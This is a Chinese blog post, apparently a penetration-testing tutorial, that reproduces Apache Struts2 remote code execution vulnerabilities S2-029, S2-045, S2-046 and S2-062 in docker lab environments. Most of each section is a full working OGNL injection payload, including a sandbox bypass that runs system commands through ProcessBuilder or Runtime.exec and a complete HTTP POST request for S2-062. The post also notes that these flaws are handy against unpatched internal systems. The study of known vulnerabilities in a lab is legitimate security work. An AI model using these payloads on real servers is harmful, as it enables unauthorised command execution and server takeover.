热门框架漏洞--Struts2

最新推荐文章于 2024-08-07 15:05:03 发布
最新推荐文章于 2024-08-07 15:05:03 发布
阅读量1.5k 收藏 10
点赞数 15
文章标签: struts java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jxy158212/article/details/136140156
版权
本文详细介绍了Struts2框架中的几个重要安全漏洞(S2-029,S2-045,S2-046,S2-062),包括漏洞原理、复现步骤和利用手段,强调了及时修补这些漏洞的重要性。
摘要由CSDN通过智能技术生成

一、Struts2

Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。

struts框架本身分为三个部分:核心控制器FilterDispatcher、业务控制器Action和用户实现的
企业业务逻辑组件

随着整体框架的补丁完善,现在想挖掘新的Struts2漏洞会比以前困难很多,从实际了解的情况来看,大部分用户早就修复了历史的高危漏洞。

目前在做渗透测试时,Struts2漏洞主要也是碰碰运气,或者是打到内网之后用来攻击没打补丁的系统会比较有效

二、框架特征

查看被测应用系统的源码,URL接口地址以 “.action” “.do”结尾或地址中包含“!”符号

在被测应用的服务器上查看应用所在目录/WEB-INF/lib/下的jar文件,若存在struts2-core-2.*.**.jar或xwork-core-2.*.**.jar格式的jar文件,则需检测是否存在Struts2远程代码执行漏洞

三、S2-029漏洞复现

影响版本:Struts 2.0.0 - 2.3.24.1(不包括2.3.20.3)

1、漏洞原理

Struts2的标签库使用OGNL表达式来访问ActionContext中的对象数据。为了能够访问到
ActionContext中的变量,Struts2将ActionContext设置为OGNL的上下文,并将OGNL的跟对象加入ActionContext中。

在Struts2中,如下的标签就调用了OGNL进行取值。<p>parameters: <s:property value="#parameters.msg" /></p>Struts2会解析value中的值,并当作OGNL表达式进行执行,获取到parameters对象的msg属性

2、漏洞复现

①拉取环境

docker pull medicean/vulapps:s_struts2_s2-029

②启动漏洞环境

docker run -d -p 8080:8080 medicean/vulapps:s_struts2_s2-029

③访问

④利用工具

⑤手动

(%23_memberAccess['allowPrivateAccess']=true,%23_memberAccess['allowProtectedAccess']=true,%23_memberAccess['excludedPackageNamePatterns']=%23_memberAccess['acceptProperties'],%23_memberAccess['excludedClasses']=%23_memberAccess['acceptProperties'],%23_memberAccess['allowPackageProtectedAccess']=true,%23_memberAccess['allowStaticMethodAccess']=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream()))

四、S2-045/046漏洞复现

1、漏洞原理

Struts 2默认使用org.apache.struts 2.dispatcher.multi part.Jakarta Multi Part Request 类对上传数据进行解析,其在处理Content-Type时如果获得非预期的值的话,将会抛出一个异常。在处理异常的过程中会对错误信息进行OGNL表达式解析。如果错误信息中包含恶意语句,语句将被执行。

S2-045只有一种触发形式,就是将OGNL表达式注入到HTTP头的Content-Type

S2-046则有两种利用形式,第一是Content-Length 的长度值超长,第二是Content-Disposition的filename存在空字节,但两种触发形式其OGNL表达式注入点都是Content-Disposition的filename中。

2、S2-045

①启动环境

②查看端口

③访问环境

④工具利用

⑤手工

poc

%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(100*5000)).(#ros.flush())}

3、S2-046

 ①启动环境

②查看端口

③访问环境

④工具利用

⑤手工

poc

"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} b"

进行00截断

五、S2-062漏洞复现

1、漏洞原理

Struts2会对某些标签属性(比如id,其他属性有待寻找)的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x} 且 x 的值用户可控时,用户再传入一个 %{payload} 即可造成OGNL表达式执行

2、漏洞复现

 ①启动环境

②查看端口

③访问环境

④手工

poc

POST /index.action HTTP/1.1
Host: 192.168.111.129:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 827

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("id")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

哈哈。。。。。。
关注
Struts2漏洞
lin062854的专栏
11-03 3371
Struts 2.3.15版本被曝出存在重要的安全漏洞,主要问题如下   1、可远程执行服务器脚本代码          用户可以构造http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','her
struts2-scan_struts2-scan_struts2scan_scan_struts2漏洞_
09-29
struts2-scan 检测struts2漏洞,认证检测struts2漏洞
Struts2框架漏洞(附漏洞修复方法)
最新发布
C233333235的博客
08-07 387
Apache Struts 2 最初被称为 WebWork 2,它是一个简洁的、可扩展的框架,可用于创建企业级Java web应用程序。设计这个框架是为了从构建、部署、到应用程序维护方面来简化整个开发周期。Struts 2在2007年7月23日发布的第一个Struts 2漏洞S2-001。Struts2漏洞是一个远程命令执行漏洞和开放重定向漏洞。利用漏洞,黑客可发起远程攻击不但可以窃取网站数据信息,甚至还可取得网站服务器控制权。
struts2漏洞
qq_52527336的博客
06-30 1万+
记一下笔记一个个写吧
Struts2 漏洞集合
kali_Ma的博客
01-21 7536
Struts2 漏洞集合 总结了一部分 Strtus2 漏洞,虽然现在这部分的漏洞很少了,但也是学习的一部分,收集的并不全面,后续会做补充。 漏洞环境搭建可以使用在线的 Vulfocus ,或者使用docker部署 S2-001 (CVE-2007-4556) 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用
【渗透测试】Struts2系列漏洞
weixin_53972936的博客
10-29 1万+
Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://baike.baidu.com/item/Java EE) Web应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品
网络安全---渗透测试---框架漏洞-ThinkPHP5.0、Struts2
weixin_52796034的博客
11-05 916
反弹shell(Reverse Shell)是一种计算机安全和网络攻击技术,通常被用于与远程目标系统建立命令行交互式连接。这个连接允许攻击者在远程系统上执行命令,获取系统访问权限,以及进行横向移动和数据操作。反弹shell的工作方式如下:攻击者和目标系统之间建立连接:通常,攻击者首先在目标系统上部署一个恶意程序(例如Trojan或后门),该程序会与攻击者的控制服务器建立连接。目标系统反弹连接:一旦恶意程序在目标系统上执行,它会尝试与攻击者的控制服务器建立连接。
Web框架漏洞--Struts2 漏洞S2-052
qq_54713392的博客
05-08 884
Web框架漏洞Struts2 漏洞S2-052 漏洞利用: Apache Struts2的REST插件存在远程代码执行的高危漏洞,Struts2 REST插件的XStream插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。 攻击机:window10 IP:192.168.32.1 靶机:ubantu16.04 IP:192.168.32.142 (1)使用vulhub靶场,进入到s2-052
Web框架漏洞--Struts2 漏洞S2-045
qq_54713392的博客
05-08 1358
Web框架漏洞Struts2 漏洞S2-045 漏洞原理: 在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。 攻击机:window10 IP:192.168.32.1 靶机:ubantu16.04 IP:192.168.32.142 (1)使用vulhub靶场,进入到s2-045漏洞目录下 开启s2-045环境 执行命令:docker-compose
框架漏洞-CVE复现-ThinkPHP+Laravel+Struts+Spring
xiaoheizi的博客
07-16 415
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("要执行的命令")就是别人写好包装起来的一套工具,把你原先必须要写的,必须要做的一些复杂的东西都写好了放在那里,你只要调用他的方法,就可以实现一些本来要费好大劲的功能。工具:https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP。我要执行的是反弹shell命令,需要先对命令进行编码。
struts2架构网站漏洞修复详情与利用漏洞修复方案
weixin_34319111的博客
12-03 1369
struts2从开发出来到现在,很多互联网企业,公司,平台都在使用apache struts2系统来开发网站,以及应用系统,这几年来因为使用较多,被攻击者挖掘出来的struts2漏洞也越来越,从最一开始S2-001到现在的最新的s2-057漏洞,本文着重的给大家介绍一下struts2漏洞的利用详情以及漏洞修复办法。 先从1开始吧,S2-001影响的版本...
Struts2框架漏洞
qian_227的博客
07-16 226
{iii}S2-045/S2-046漏洞Struts2使用基于Jakarta的文件上传Multipart解析器,如果该Content-Type值无效,则会引发异常,然后将其用于向用户显示错误消息,并对异常信息进行OGNL表达式处理,可以构造恶意Content-Type值执行RCE攻击。S2-046与S2-045漏洞的引发原因一致,只是他们的利用位置不一样。{ii}S2-005漏洞:S2-005是由于官方在修补S2-003 不全面导致绕过补丁造成的。
Struts2漏洞分析
云守护的专栏
05-21 2832
Struts2漏洞分析 当在浏览器输入如下地址时:        http://www.xxxx.com/aaa.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u00
Struts2漏洞 - Struts2-015 Struts2-016 Struts2-045
HAKUNAMATATATTA的博客
12-21 2824
Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts2Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。
Struts2 系列漏洞 - S2-003、S2-005
YJ_12340的博客
06-11 767
前面一篇文章也有提到 struts2 在进入 action 进行逻辑处理前(以及逻辑处理后),会进入 18 个拦截器栈中对请求进行必要的处理(如果没有自定义拦截器的话,可以在 struts-default.xml 中找到相应的拦截器栈,如下下图【这里只有 17 个拦截器 233 】)。下图为 struts2 在处理请求时走过的流程。
Struts2漏洞分析与复现合集
未完成的歌~的博客
08-22 7367
原理:该漏洞因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。 漏洞环境搭建 https://github.com/vulhub/vulhub/tree/master/struts2/s2-001 运行以下命令进行设置 .............
Struts2入门
热门推荐
Java之道
10-07 1万+
Struts2 简介                                                                ++YONG原创,转载请注明1.    Struts2的由来:Struts 1是全世界第一个发布的MVC框架,它由Craig McClanahan在2001年6月发布,该框架一经推出,就得到了世界上Java Web开发者的拥护,经过长达
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值